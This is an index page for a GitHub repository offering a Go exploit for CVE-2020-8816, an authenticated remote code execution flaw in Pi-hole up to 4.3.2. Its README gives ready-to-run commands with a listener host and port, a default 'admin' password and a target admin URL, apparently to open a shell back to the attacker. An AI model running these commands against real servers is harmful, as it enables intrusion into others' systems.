https://github.com/team0se7en/cve-2020-8816
Pi-hole ( <= 4.3.2) authenticated remote code execution.
https://github.com/team0se7en/cve-2020-8816
cve-2020-8811 exploit golang pi-hole privesc rce
Last synced: 3 months ago
JSON representation
Pi-hole ( <= 4.3.2) authenticated remote code execution.
- Host: GitHub
- URL: https://github.com/team0se7en/cve-2020-8816
- Owner: team0se7en
- Created: 2020-08-06T14:04:54.000Z (almost 5 years ago)
- Default Branch: master
- Last Pushed: 2020-08-06T15:14:12.000Z (almost 5 years ago)
- Last Synced: 2024-10-29T22:36:29.085Z (7 months ago)
- Topics: cve-2020-8811, exploit, golang, pi-hole, privesc, rce
- Language: Go
- Homepage:
- Size: 4.16 MB
- Stars: 6
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## CVE 2020-8816 :
[Pi-hole](https://fr.wikipedia.org/wiki/Pi-hole) (versions <= 4.3.2 ) is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary command with the underlying server with the privileges of the local user executing the service.
## EXAMPLE :
` go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ `
or download the binary [CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816/releases/tag/0.0.1) :
` ./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ `
![]()
![]()
![]()
## References :
- https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/